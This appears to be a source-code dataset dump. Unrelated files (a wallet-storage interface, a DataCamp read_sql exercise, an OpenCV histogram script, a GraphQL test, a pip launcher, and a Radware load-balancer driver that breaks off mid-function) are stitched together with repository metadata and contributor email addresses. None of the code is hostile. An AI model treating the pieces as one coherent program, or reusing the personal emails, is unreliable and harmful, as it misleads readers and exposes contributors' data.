    @abstractmethod
    async def update_wallet_record_value(self, type_: str, id_: str, value: str) -> None:
        """
        Update a non-secret wallet record value

        :param type_: allows to separate different record types collections
        :param id_: the id of record
        :param value: the value of record
        :return: None
        """
        raise NotImplementedError

    @abstractmethod
    async def update_wallet_record_tags(self, type_: str, id_: str, tags: dict) -> None:
        """
        Update a non-secret wallet record tags

        :param type_: allows to separate different record types collections
        :param id_: the id of record
        :param tags: tags_json: the record tags used for search and storing meta information as json:
           {
             "tagName1": <str>, // string tag (will be stored encrypted)
             "tagName2": <str>, // string tag (will be stored encrypted)
             "~tagName3": <str>, // string tag (will be stored un-encrypted)
             "~tagName4": <str>, // string tag (will be stored un-encrypted)
           }
        :return: None
        """
        raise NotImplementedError

    @abstractmethod
    async def add_wallet_record_tags(self, type_: str, id_: str, tags: dict) -> None:
        """
        Add new tags to the wallet record

        :param type_: allows to separate different record types collections
        :param id_: the id of record
        :param tags: tags_json: the record tags used for search and storing meta information as json:
           {
             "tagName1": <str>, // string tag (will be stored encrypted)
             "tagName2": <str>, // string tag (will be stored encrypted)
             "~tagName3": <str>, // string tag (will be stored un-encrypted)
             "~tagName4": <str>, // string tag (will be stored un-encrypted)
           }
        :return: None
        """
        raise NotImplementedError

    @abstractmethod
    async def delete_wallet_record_tags(self, type_: str, id_: str, tag_names: List[str]) -> None:
        """
        Delete tags from the wallet record

        :param type_: allows to separate different record types collections
        :param id_: the id of record
        :param tag_names: the list of tag names to remove from the record as json array: ["tagName1", "tagName2", ...]
        :return: None
        """
        raise NotImplementedError

    @abstractmethod
    async def delete_wallet_record(self, type_: str, id_: str) -> None:
        """
        Delete an existing wallet record in the wallet

        :param type_: allows to separate different record types collections
        :param id_: the id of record
        :return: None
        """
        raise NotImplementedError

    @abstractmethod
    async def get_wallet_record(self, type_: str, id_: str, options: RetrieveRecordOptions) -> Optional[dict]:
        """
        Get a wallet record by id

        :param type_: allows to separate different record types collections
        :param id_: the id of record
        :param options:
          {
            retrieveType: (optional, false by default) Retrieve record type,
            retrieveValue: (optional, true by default) Retrieve record value,
            retrieveTags: (optional, true by default) Retrieve record tags
          }
        :return: wallet record json:
         {
           id: "Some id",
           type: "Some type", // present only if retrieveType set to true
           value: "Some value", // present only if retrieveValue set to true
           tags: <tags json>, // present only if retrieveTags set to true
         }
        """
        raise NotImplementedError

    @abstractmethod
    async def wallet_search(self, type_: str, query: dict, options: RetrieveRecordOptions, limit: int = 1) -> (List[dict], int):
        """
        Search for wallet records

        :param type_: allows to separate different record types collections
        :param query: MongoDB style query to wallet record tags:
          {
            "tagName": "tagValue",
            $or: {
              "tagName2": { $regex: 'pattern' },
              "tagName3": { $gte: '123' },
            },
          }
        :param options:
          {
            retrieveRecords: (optional, true by default) If false only "counts" will be calculated,
            retrieveTotalCount: (optional, false by default) Calculate total count,
            retrieveType: (optional, false by default) Retrieve record type,
            retrieveValue: (optional, true by default) Retrieve record value,
            retrieveTags: (optional, true by default) Retrieve record tags,
          }
        :param limit: max record count to retrieve
        :return: wallet records json:
         {
           totalCount: <str>, // present only if retrieveTotalCount set to true
           records: [{ // present only if retrieveRecords set to true
               id: "Some id",
               type: "Some type", // present only if retrieveType set to true
               value: "Some value", // present only if retrieveValue set to true
               tags: <tags json>, // present only if retrieveTags set to true
           }],
         }
        """
        raise NotImplementedError
"minikspb@gmail.com"
] | minikspb@gmail.com |
33f0a35f5feb7df1dd4eaeaba4f463974e6e5c27 | 1d60c5a7b8ce6277bff514e376f79848f706344c | /Data Engineer with Python/02. Streamlined Data Ingestion with pandas/03. Importing Data from Databases/02. Load entire tables.py | 87520ffcb0f8e37e20dcee08416d6f66edf13411 | [] | no_license | DidiMilikina/DataCamp | 338c6e6d3b4f5b6c541c1aba155a36e9ee24949d | 3bf2cf3c1430190a7f8e54efda7d50a5fd66f244 | refs/heads/master | 2020-12-15T13:16:54.178967 | 2020-05-06T17:30:54 | 2020-05-06T17:30:54 | 235,113,616 | 4 | 3 | null | null | null | null | UTF-8 | Python | false | false | 1,266 | py | '''
Load entire tables
In the last exercise, you saw that data.db has two tables. weather has historical weather data for New York City. hpd311calls is a subset of call records made to the city's 311 help line about housing issues.
In this exercise, you'll use the read_sql() function in pandas to load both tables. read_sql() accepts a string of either a SQL query to run, or a table to load. It also needs a way to connect to the database, like the engine in the provided code.
Instructions 1/2
50 XP
1
Use read_sql() to load the hpd311calls table by name, without any SQL.
2
Use read_sql() and a SELECT * ... SQL query to load the entire weather table.
'''
SOLUTION
1
# Load libraries
import pandas as pd
from sqlalchemy import create_engine
# Create the database engine
engine = create_engine('sqlite:///data.db')
# Load hpd311calls without any SQL
hpd_calls = pd.read_sql('hpd311calls', engine)
# View the first few rows of data
print(hpd_calls.head())
2
# Create the database engine
engine = create_engine("sqlite:///data.db")
# Create a SQL query to load the entire weather table
query = """
SELECT *
FROM weather;
"""
# Load weather with the SQL query
weather = pd.read_sql(query, engine)
# View the first few rows of data
print(weather.head()) | [
"didimilikina8@gmail.com"
] | didimilikina8@gmail.com |
ae630ac12f733e37781b6ebbc2773032c9f2cac5 | 88863cb16f35cd479d43f2e7852d20064daa0c89 | /DraperImageChronology/src/inv-hist-match.py | 5bc7b4f8af190bf3b43f08c71c04caa2a975ea03 | [] | no_license | chrishefele/kaggle-sample-code | 842c3cd766003f3b8257fddc4d61b919e87526c4 | 1c04e859c7376f8757b011ed5a9a1f455bd598b9 | refs/heads/master | 2020-12-29T12:18:09.957285 | 2020-12-22T20:16:35 | 2020-12-22T20:16:35 | 238,604,678 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 853 | py |
# invert histogram matching on an image
import cv2
import sys
import numpy
MAX = 255
MIN = 0
f_in = sys.argv[1]
f_out = sys.argv[2]
img_in = cv2.imread(f_in)
img_out = numpy.zeros_like(img_in)
RGB = (0,1,2)
for chan in RGB:
mean = img_in[:,:,chan].mean()
hist = cv2.calcHist([img_in], [chan], None, [256], [0,256])
hist = hist.flatten().astype(int)
lut = numpy.zeros_like(hist)
ptr = int(mean)
for i in range(int(mean), MAX+1, 1):
if hist[i] > 0:
lut[i] = ptr
ptr += 1
ptr = int(mean)-1
for i in range(int(mean)-1, MIN, -1):
if hist[i] > 0:
lut[i] = ptr
ptr -= 1
img_out[:,:,chan] = lut[ img_in[:,:,chan] ]
print "channel:", chan, "mean:", mean
print "hist:", hist
print "lut:", lut
print
cv2.imwrite(f_out, img_out)
| [
"c.hefele@verizon.net"
] | c.hefele@verizon.net |
9946676665a43725bcf984b91c4ab8323c8ddfe2 | d62cbada00caf2f7784066014a87e18052d6fa9f | /darksite/functional_tests/blog/test_list_posts.py | b8bd85d1dfcf15b689e4663ee7234a073d6f17d6 | [
"MIT"
] | permissive | UNCDarkside/DarksiteAPI | d6653990bce6b78db78efc672fde2c0ff20e4597 | a4bc1f4adee7ecfba840ad45da22513f88acbbd0 | refs/heads/master | 2020-04-11T17:36:19.062963 | 2019-01-11T03:42:31 | 2019-01-11T03:42:31 | 161,967,336 | 0 | 0 | MIT | 2019-10-22T22:09:50 | 2018-12-16T04:23:27 | Python | UTF-8 | Python | false | false | 1,311 | py | from cms.blog import models
POST_LIST_QUERY = """
query {
posts {
author {
id
name
}
content
published
rendered
slug
title
updated
}
}
"""
def test_list_posts(api_client, post_factory):
"""
Users should be able to query a list of blog posts through the
GraphQL API.
"""
# Assuming there are two posts already in the database...
post_factory(content="# Post 1", title="Post 1")
post_factory(content="# Post 2", title="Post 2")
# I would expect my response to be...
expected = []
for post in models.Post.objects.all():
expected.append(
{
"author": {
"id": str(post.author.id),
"name": post.author.name,
},
"content": post.content,
"published": post.published.isoformat(),
"rendered": post.rendered,
"slug": post.slug,
"title": post.title,
"updated": post.updated.isoformat(),
}
)
# Make the actual request
response = api_client.query(POST_LIST_QUERY)
response.raise_for_status()
# Check content
assert response.status_code == 200
assert response.json() == {"data": {"posts": expected}}
| [
"chathan@driehuys.com"
] | chathan@driehuys.com |
76c7e9f6bb07b3cce7f96db7880426f1f4f29e45 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/nouns/_pursing.py | 97ccd6b1d0f43869691995232bdae3346650ddd4 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 233 | py |
from xai.brain.wordbase.nouns._purse import _PURSE
#calss header
class _PURSING(_PURSE, ):
def __init__(self,):
_PURSE.__init__(self)
self.name = "PURSING"
self.specie = 'nouns'
self.basic = "purse"
self.jsondata = {}
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
8dfaa6138f567ae7ded66b8e50f29bf4fa670785 | 21569b68b510b55bdc2acb1ff5ae521b31d44a79 | /bin/pip | 6d43f954d84428e41a3f031821b38e7f3161f5ff | [] | no_license | howarder3/Rpi3_study | a99faef434ae4f751d4d9f339aca918186f7cb3e | 533ba60ae4d11b5e3cebc12283e067ccee5a5cfd | refs/heads/master | 2020-03-18T18:11:01.030936 | 2018-05-27T20:46:40 | 2018-05-27T20:46:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 225 | #!/home/pi/myenv/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from pip._internal import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"howarder3@gmail.com"
] | howarder3@gmail.com | |
08dfb0dd27c8af7d6a677376a9c1b968188aae7d | 9398d8433fdb29ee630a6ee43a07bc36a2adbd88 | /neutron_lbaas/drivers/radware/v2_driver.py | 3067302f452e2971128d6b9972319a601441c360 | [] | no_license | bopopescu/OpenStack_Liberty_Control | ca5a21d0c32c55dc8c517f5c7c9938ce575a4888 | 0f6ec1b4d38c47776fdf8935266bcaef2464af4c | refs/heads/master | 2022-12-03T10:41:53.210667 | 2016-03-29T06:25:58 | 2016-03-29T06:25:58 | 282,089,815 | 0 | 0 | null | 2020-07-24T01:04:15 | 2020-07-24T01:04:14 | null | UTF-8 | Python | false | false | 30,218 | py | # Copyright 2015, Radware LTD. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import netaddr
import threading
import time
from neutron.api.v2 import attributes
from neutron import context
from neutron.plugins.common import constants
from oslo_config import cfg
from oslo_log import helpers as log_helpers
from oslo_log import log as logging
from oslo_utils import excutils
from six.moves import queue as Queue
from neutron_lbaas._i18n import _LE, _LW, _LI
import neutron_lbaas.common.cert_manager
from neutron_lbaas.drivers.radware import base_v2_driver
from neutron_lbaas.drivers.radware import exceptions as r_exc
from neutron_lbaas.drivers.radware import rest_client as rest
# Backend used to fetch TLS certificates referenced by listeners.
CERT_MANAGER_PLUGIN = neutron_lbaas.common.cert_manager.get_backend()

# Content-Type headers for the various vDirect REST payloads.
TEMPLATE_HEADER = {'Content-Type':
                   'application/vnd.com.radware.vdirect.'
                   'template-parameters+json'}
PROVISION_HEADER = {'Content-Type':
                    'application/vnd.com.radware.'
                    'vdirect.status+json'}
CREATE_SERVICE_HEADER = {'Content-Type':
                         'application/vnd.com.radware.'
                         'vdirect.adc-service-specification+json'}

# Fallback values used when an attribute is absent from the data model
# while building the workflow object graph.
PROPERTY_DEFAULTS = {'type': 'none',
                     'cookie_name': 'none',
                     'url_path': '/',
                     'http_method': 'GET',
                     'expected_codes': '200',
                     'subnet': '255.255.255.255',
                     'mask': '255.255.255.255',
                     'gw': '255.255.255.255',
                     }

# Attribute names copied from each LBaaS object into the vDirect graph.
LOADBALANCER_PROPERTIES = ['vip_address', 'admin_state_up']
LISTENER_PROPERTIES = ['id', 'protocol_port', 'protocol',
                       'connection_limit', 'admin_state_up']
POOL_PROPERTIES = ['id', 'protocol', 'lb_algorithm', 'admin_state_up']
MEMBER_PROPERTIES = ['id', 'address', 'protocol_port', 'weight',
                     'admin_state_up', 'subnet', 'mask', 'gw']
SESSION_PERSISTENCY_PROPERTIES = ['type', 'cookie_name']
HEALTH_MONITOR_PROPERTIES = ['type', 'delay', 'timeout', 'max_retries',
                             'admin_state_up', 'url_path', 'http_method',
                             'expected_codes', 'id']

LOG = logging.getLogger(__name__)
class RadwareLBaaSV2Driver(base_v2_driver.RadwareLBaaSBaseV2Driver):
#
# Assumptions:
# 1) We have only one worflow that takes care of l2-l4 and service creation
# 2) The workflow template exists on the vDirect server
# 3) The workflow expose one operaion named 'update' (plus ctor and dtor)
# 4) The 'update' operation gets the loadbalancer object graph as input
# 5) The object graph is enehanced by our code before it is sent to the
# workflow
# 6) Async operations are handled by a different thread
#
    def __init__(self, plugin):
        """Build the vDirect service payload template and REST client.

        :param plugin: LBaaS plugin instance; retained for DB access and
            handed to the completion handler for finishing async operations.
        """
        base_v2_driver.RadwareLBaaSBaseV2Driver.__init__(self, plugin)
        rad = cfg.CONF.radwarev2
        rad_debug = cfg.CONF.radwarev2_debug
        self.plugin = plugin
        # ADC service specification template sent to vDirect;
        # '_REPLACE_' placeholders are filled per-LB in _create_workflow().
        self.service = {
            "name": "_REPLACE_",
            "tenantId": "_REPLACE_",
            "haPair": rad.service_ha_pair,
            "sessionMirroringEnabled": rad.service_session_mirroring_enabled,
            "primary": {
                "capacity": {
                    "throughput": rad.service_throughput,
                    "sslThroughput": rad.service_ssl_throughput,
                    "compressionThroughput":
                    rad.service_compression_throughput,
                    "cache": rad.service_cache
                },
                "network": {
                    "type": "portgroup",
                    "portgroups": '_REPLACE_'
                },
                "adcType": rad.service_adc_type,
                "acceptableAdc": "Exact"
            }
        }
        # Optional resource pools and ISL VLAN from configuration.
        if rad.service_resource_pool_ids:
            ids = rad.service_resource_pool_ids
            self.service['resourcePoolIds'] = [
                {'id': id} for id in ids
            ]
        else:
            self.service['resourcePoolIds'] = []
        if rad.service_isl_vlan:
            self.service['islVlan'] = rad.service_isl_vlan
        self.workflow_template_name = rad.workflow_template_name
        self.child_workflow_template_names = rad.child_workflow_template_names
        self.workflow_params = rad.workflow_params
        self.workflow_action_name = rad.workflow_action_name
        self.stats_action_name = rad.stats_action_name
        vdirect_address = rad.vdirect_address
        sec_server = rad.ha_secondary_address
        # REST client talking to the (possibly HA-paired) vDirect server.
        self.rest_client = rest.vDirectRESTClient(
            server=vdirect_address,
            secondary_server=sec_server,
            user=rad.vdirect_user,
            password=rad.vdirect_password)
        # Debug switches let parts of the provisioning be skipped.
        self.workflow_params['provision_service'] = rad_debug.provision_service
        self.workflow_params['configure_l3'] = rad_debug.configure_l3
        self.workflow_params['configure_l4'] = rad_debug.configure_l4

        # Async vDirect operations are pushed onto this queue and finalized
        # by a daemon thread started lazily on first use.
        self.queue = Queue.Queue()
        self.completion_handler = OperationCompletionHandler(self.queue,
                                                             self.rest_client,
                                                             plugin)
        self.workflow_templates_exists = False
        self.completion_handler.setDaemon(True)
        self.completion_handler_started = False
def _start_completion_handling_thread(self):
if not self.completion_handler_started:
LOG.info(_LI('Starting operation completion handling thread'))
self.completion_handler.start()
self.completion_handler_started = True
@staticmethod
def _get_wf_name(lb):
return 'LB_' + lb.id
@log_helpers.log_method_call
def _verify_workflow_templates(self):
"""Verify the existence of workflows on vDirect server."""
resource = '/api/workflowTemplate/'
workflow_templates = {self.workflow_template_name: False}
for child_wf_name in self.child_workflow_template_names:
workflow_templates[child_wf_name] = False
response = _rest_wrapper(self.rest_client.call('GET',
resource,
None,
None), [200])
for workflow_template in workflow_templates.keys():
for template in response:
if workflow_template == template['name']:
workflow_templates[workflow_template] = True
break
for template, found in workflow_templates.items():
if not found:
raise r_exc.WorkflowTemplateMissing(
workflow_template=template)
@log_helpers.log_method_call
def workflow_exists(self, lb):
"""Create workflow for loadbalancer instance"""
wf_name = self._get_wf_name(lb)
wf_resource = '/api/workflow/%s' % (wf_name)
try:
_rest_wrapper(self.rest_client.call(
'GET', wf_resource, None, None),
[200])
except Exception:
return False
return True
@log_helpers.log_method_call
def _create_workflow(self, lb, lb_network_id, proxy_network_id):
"""Create workflow for loadbalancer instance"""
self._verify_workflow_templates()
wf_name = self._get_wf_name(lb)
service = copy.deepcopy(self.service)
service['tenantId'] = lb.tenant_id
service['name'] = 'srv_' + lb_network_id
if lb_network_id != proxy_network_id:
self.workflow_params["twoleg_enabled"] = True
service['primary']['network']['portgroups'] = [
lb_network_id, proxy_network_id]
else:
self.workflow_params["twoleg_enabled"] = False
service['primary']['network']['portgroups'] = [lb_network_id]
tmpl_resource = '/api/workflowTemplate/%s?name=%s' % (
self.workflow_template_name, wf_name)
_rest_wrapper(self.rest_client.call(
'POST', tmpl_resource,
{'parameters': dict(self.workflow_params,
service_params=service)},
TEMPLATE_HEADER))
@log_helpers.log_method_call
def get_stats(self, ctx, lb):
wf_name = self._get_wf_name(lb)
resource = '/api/workflow/%s/action/%s' % (
wf_name, self.stats_action_name)
response = _rest_wrapper(self.rest_client.call('POST', resource,
None, TEMPLATE_HEADER), success_codes=[202])
LOG.debug('stats_action response: %s ', response)
resource = '/api/workflow/%s/parameters' % (wf_name)
response = _rest_wrapper(self.rest_client.call('GET', resource,
None, TEMPLATE_HEADER), success_codes=[200])
LOG.debug('stats_values response: %s ', response)
return response['stats']
    @log_helpers.log_method_call
    def execute_workflow(self, ctx, manager, data_model,
                         old_data_model=None, delete=False):
        """Run the 'update' workflow action with the current LB object graph.

        Creates the workflow (and a proxy port, if members live behind a
        different subnet) on first use, then posts the object graph and
        queues an OperationAttributes for async completion handling.
        """
        lb = data_model.root_loadbalancer

        # Get possible proxy subnet.
        # Proxy subnet equals to LB subnet if no proxy
        # is necessary.
        # Get subnet id of any member located on different than
        # loadbalancer's network. If returned subnet id is the subnet id
        # of loadbalancer - all members are accessible from loadbalancer's
        # network, meaning no second leg or static routes are required.
        # Otherwise, create proxy port on found member's subnet and get its
        # address as a proxy address for loadbalancer instance
        lb_subnet = self.plugin.db._core_plugin.get_subnet(
            ctx, lb.vip_subnet_id)
        proxy_subnet = lb_subnet
        proxy_port_address = lb.vip_address

        if not self.workflow_exists(lb):
            # Create proxy port if needed
            proxy_port_subnet_id = self._get_proxy_port_subnet_id(lb)
            if proxy_port_subnet_id != lb.vip_subnet_id:
                proxy_port = self._create_proxy_port(
                    ctx, lb, proxy_port_subnet_id)
                proxy_subnet = self.plugin.db._core_plugin.get_subnet(
                    ctx, proxy_port['subnet_id'])
                proxy_port_address = proxy_port['ip_address']

            self._create_workflow(lb,
                                  lb_subnet['network_id'],
                                  proxy_subnet['network_id'])
        else:
            # Check if proxy port exists
            proxy_port = self._get_proxy_port(ctx, lb)
            if proxy_port:
                proxy_subnet = self.plugin.db._core_plugin.get_subnet(
                    ctx, proxy_port['subnet_id'])
                proxy_port_address = proxy_port['ip_address']

        # Build objects graph
        objects_graph = self._build_objects_graph(ctx, lb, data_model,
                                                  proxy_port_address,
                                                  proxy_subnet)
        LOG.debug("Radware vDirect LB object graph is " + str(objects_graph))

        # Post the graph to the workflow's update action (async: 202).
        wf_name = self._get_wf_name(lb)
        resource = '/api/workflow/%s/action/%s' % (
            wf_name, self.workflow_action_name)
        response = _rest_wrapper(self.rest_client.call('POST', resource,
                                 {'parameters': objects_graph},
                                 TEMPLATE_HEADER), success_codes=[202])
        LOG.debug('_update_workflow response: %s ', response)

        # Queue the pending operation for the completion-handler thread.
        oper = OperationAttributes(
            manager, response['uri'], lb,
            data_model, old_data_model,
            delete=delete)

        LOG.debug('Pushing operation %s to the queue', oper)
        self._start_completion_handling_thread()
        self.queue.put_nowait(oper)
def remove_workflow(self, ctx, manager, lb):
wf_name = self._get_wf_name(lb)
LOG.debug('Remove the workflow %s' % wf_name)
resource = '/api/workflow/%s' % (wf_name)
rest_return = self.rest_client.call('DELETE', resource, None, None)
response = _rest_wrapper(rest_return, [204, 202, 404])
if rest_return[rest.RESP_STATUS] in [404]:
try:
self._delete_proxy_port(ctx, lb)
LOG.debug('Proxy port for LB %s was deleted', lb.id)
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(_LE('Proxy port deletion for LB %s '
'failed'), lb.id)
manager.successful_completion(ctx, lb, delete=True)
else:
oper = OperationAttributes(
manager, response['uri'], lb,
lb, old_data_model=None,
delete=True,
post_operation_function=self._delete_proxy_port)
self._start_completion_handling_thread()
self.queue.put_nowait(oper)
def _build_objects_graph(self, ctx, lb, data_model,
proxy_port_address, proxy_subnet):
"""Iterate over the LB model starting from root lb entity
and build its JSON representtaion for vDirect
"""
graph = {}
for prop in LOADBALANCER_PROPERTIES:
graph[prop] = getattr(lb, prop, PROPERTY_DEFAULTS.get(prop))
graph['pip_address'] = proxy_port_address
graph['listeners'] = []
listeners = [
listener for listener in lb.listeners
if listener.provisioning_status != constants.PENDING_DELETE and
(listener.default_pool and listener.default_pool.members)]
for listener in listeners:
listener_dict = {}
for prop in LISTENER_PROPERTIES:
listener_dict[prop] = getattr(
listener, prop, PROPERTY_DEFAULTS.get(prop))
cert_mgr = CERT_MANAGER_PLUGIN.CertManager()
if listener.default_tls_container_id:
default_cert = cert_mgr.get_cert(
project_id=listener.tenant_id,
cert_ref=listener.default_tls_container_id,
resource_ref=cert_mgr.get_service_url(
listener.loadbalancer_id),
service_name='Neutron LBaaS v2 Radware provider')
cert_dict = {
'id': listener.default_tls_container_id,
'certificate': default_cert.get_certificate(),
'intermediates': default_cert.get_intermediates(),
'private_key': default_cert.get_private_key(),
'passphrase': default_cert.get_private_key_passphrase()}
listener_dict['default_tls_certificate'] = cert_dict
if listener.sni_containers:
listener_dict['sni_tls_certificates'] = []
for sni_container in listener.sni_containers:
sni_cert = cert_mgr.get_cert(
project_id=listener.tenant_id,
cert_ref=sni_container.tls_container_id,
resource_ref=cert_mgr.get_service_url(
listener.loadbalancer_id),
service_name='Neutron LBaaS v2 Radware provider')
listener_dict['sni_tls_certificates'].append(
{'id': sni_container.tls_container_id,
'position': sni_container.position,
'certificate': sni_cert.get_certificate(),
'intermediates': sni_cert.get_intermediates(),
'private_key': sni_cert.get_private_key(),
'passphrase': sni_cert.get_private_key_passphrase()})
if (listener.default_pool and
listener.default_pool.provisioning_status !=
constants.PENDING_DELETE):
pool_dict = {}
for prop in POOL_PROPERTIES:
pool_dict[prop] = getattr(
listener.default_pool, prop,
PROPERTY_DEFAULTS.get(prop))
if (listener.default_pool.healthmonitor and
listener.default_pool.healthmonitor.provisioning_status !=
constants.PENDING_DELETE):
hm_dict = {}
for prop in HEALTH_MONITOR_PROPERTIES:
hm_dict[prop] = getattr(
listener.default_pool.healthmonitor, prop,
PROPERTY_DEFAULTS.get(prop))
pool_dict['healthmonitor'] = hm_dict
if listener.default_pool.session_persistence:
sess_pers_dict = {}
for prop in SESSION_PERSISTENCY_PROPERTIES:
sess_pers_dict[prop] = getattr(
listener.default_pool.session_persistence, prop,
PROPERTY_DEFAULTS.get(prop))
pool_dict['sessionpersistence'] = sess_pers_dict
pool_dict['members'] = []
members = [
member for member in listener.default_pool.members
if member.provisioning_status != constants.PENDING_DELETE]
for member in members:
member_dict = {}
for prop in MEMBER_PROPERTIES:
member_dict[prop] = getattr(
member, prop,
PROPERTY_DEFAULTS.get(prop))
if (proxy_port_address != lb.vip_address and
netaddr.IPAddress(member.address)
not in netaddr.IPNetwork(proxy_subnet['cidr'])):
self._accomplish_member_static_route_data(
ctx, member, member_dict,
proxy_subnet['gateway_ip'])
pool_dict['members'].append(member_dict)
listener_dict['default_pool'] = pool_dict
graph['listeners'].append(listener_dict)
return graph
def _get_proxy_port_subnet_id(self, lb):
"""Look for at least one member of any listener's pool
that is located on subnet different than loabalancer's subnet.
If such member found, return its subnet id.
Otherwise, return loadbalancer's subnet id
"""
for listener in lb.listeners:
if listener.default_pool:
for member in listener.default_pool.members:
if lb.vip_subnet_id != member.subnet_id:
return member.subnet_id
return lb.vip_subnet_id
def _create_proxy_port(self,
ctx, lb, proxy_port_subnet_id):
"""Check if proxy port was created earlier.
If not, create a new port on proxy subnet and return its ip address.
Returns port IP address
"""
proxy_port = self._get_proxy_port(ctx, lb)
if proxy_port:
LOG.info(_LI('LB %(lb_id)s proxy port exists on subnet \
%(subnet_id)s with ip address %(ip_address)s') %
{'lb_id': lb.id, 'subnet_id': proxy_port['subnet_id'],
'ip_address': proxy_port['ip_address']})
return proxy_port
proxy_port_name = 'proxy_' + lb.id
proxy_port_subnet = self.plugin.db._core_plugin.get_subnet(
ctx, proxy_port_subnet_id)
proxy_port_data = {
'tenant_id': lb.tenant_id,
'name': proxy_port_name,
'network_id': proxy_port_subnet['network_id'],
'mac_address': attributes.ATTR_NOT_SPECIFIED,
'admin_state_up': False,
'device_id': '',
'device_owner': 'neutron:' + constants.LOADBALANCERV2,
'fixed_ips': [{'subnet_id': proxy_port_subnet_id}]
}
proxy_port = self.plugin.db._core_plugin.create_port(
ctx, {'port': proxy_port_data})
proxy_port_ip_data = proxy_port['fixed_ips'][0]
LOG.info(_LI('LB %(lb_id)s proxy port created on subnet %(subnet_id)s \
with ip address %(ip_address)s') %
{'lb_id': lb.id, 'subnet_id': proxy_port_ip_data['subnet_id'],
'ip_address': proxy_port_ip_data['ip_address']})
return proxy_port_ip_data
def _get_proxy_port(self, ctx, lb):
ports = self.plugin.db._core_plugin.get_ports(
ctx, filters={'name': ['proxy_' + lb.id], })
if not ports:
return None
proxy_port = ports[0]
return proxy_port['fixed_ips'][0]
def _delete_proxy_port(self, ctx, lb):
port_filter = {
'name': ['proxy_' + lb.id],
}
ports = self.plugin.db._core_plugin.get_ports(
ctx, filters=port_filter)
if ports:
proxy_port = ports[0]
proxy_port_ip_data = proxy_port['fixed_ips'][0]
try:
LOG.info(_LI('Deleting LB %(lb_id)s proxy port on subnet \
%(subnet_id)s with ip address %(ip_address)s') %
{'lb_id': lb.id,
'subnet_id': proxy_port_ip_data['subnet_id'],
'ip_address': proxy_port_ip_data['ip_address']})
self.plugin.db._core_plugin.delete_port(
ctx, proxy_port['id'])
except Exception as exception:
# stop exception propagation, nport may have
# been deleted by other means
LOG.warning(_LW('Proxy port deletion failed: %r'),
exception)
def _accomplish_member_static_route_data(self,
ctx, member, member_data, proxy_gateway_ip):
member_ports = self.plugin.db._core_plugin.get_ports(
ctx,
filters={'fixed_ips': {'ip_address': [member.address]},
'tenant_id': [member.tenant_id]})
if len(member_ports) == 1:
member_port = member_ports[0]
member_port_ip_data = member_port['fixed_ips'][0]
LOG.debug('member_port_ip_data:' + repr(member_port_ip_data))
member_subnet = self.plugin.db._core_plugin.get_subnet(
ctx,
member_port_ip_data['subnet_id'])
LOG.debug('member_subnet:' + repr(member_subnet))
member_network = netaddr.IPNetwork(member_subnet['cidr'])
member_data['subnet'] = str(member_network.network)
member_data['mask'] = str(member_network.netmask)
else:
member_data['subnet'] = member_data['address']
member_data['gw'] = proxy_gateway_ip
class OperationCompletionHandler(threading.Thread):
"""Update DB with operation status or delete the entity from DB."""
def __init__(self, queue, rest_client, plugin):
threading.Thread.__init__(self)
self.queue = queue
self.rest_client = rest_client
self.plugin = plugin
self.stoprequest = threading.Event()
self.opers_to_handle_before_rest = 0
def join(self, timeout=None):
self.stoprequest.set()
super(OperationCompletionHandler, self).join(timeout)
def handle_operation_completion(self, oper):
result = self.rest_client.call('GET',
oper.operation_url,
None,
None)
LOG.debug('Operation completion requested %(uri) and got: %(result)',
{'uri': oper.operation_url, 'result': result})
completed = result[rest.RESP_DATA]['complete']
reason = result[rest.RESP_REASON],
description = result[rest.RESP_STR]
if completed:
# operation is done - update the DB with the status
# or delete the entire graph from DB
success = result[rest.RESP_DATA]['success']
sec_to_completion = time.time() - oper.creation_time
debug_data = {'oper': oper,
'sec_to_completion': sec_to_completion,
'success': success}
LOG.debug('Operation %(oper)s is completed after '
'%(sec_to_completion)d sec '
'with success status: %(success)s :',
debug_data)
if not success:
# failure - log it and set the return ERROR as DB state
if reason or description:
msg = 'Reason:%s. Description:%s' % (reason, description)
else:
msg = "unknown"
error_params = {"operation": oper, "msg": msg}
LOG.error(_LE(
'Operation %(operation)s failed. Reason: %(msg)s'),
error_params)
oper.status = constants.ERROR
OperationCompletionHandler._run_post_failure_function(oper)
else:
oper.status = constants.ACTIVE
OperationCompletionHandler._run_post_success_function(oper)
return completed
def run(self):
while not self.stoprequest.isSet():
try:
oper = self.queue.get(timeout=1)
# Get the current queue size (N) and set the counter with it.
# Handle N operations with no intermission.
# Once N operations handles, get the size again and repeat.
if self.opers_to_handle_before_rest <= 0:
self.opers_to_handle_before_rest = self.queue.qsize() + 1
LOG.debug('Operation consumed from the queue: ' +
str(oper))
# check the status - if oper is done: update the db ,
# else push the oper again to the queue
if not self.handle_operation_completion(oper):
LOG.debug('Operation %s is not completed yet..' % oper)
# Not completed - push to the queue again
self.queue.put_nowait(oper)
self.queue.task_done()
self.opers_to_handle_before_rest -= 1
# Take one second rest before start handling
# new operations or operations handled before
if self.opers_to_handle_before_rest <= 0:
time.sleep(1)
except Queue.Empty:
continue
except Exception:
LOG.error(_LE(
"Exception was thrown inside OperationCompletionHandler"))
@staticmethod
def _run_post_success_function(oper):
try:
ctx = context.get_admin_context()
if oper.post_operation_function:
oper.post_operation_function(ctx, oper.data_model)
oper.manager.successful_completion(ctx, oper.data_model,
delete=oper.delete)
LOG.debug('Post-operation success function completed '
'for operation %s',
repr(oper))
except Exception:
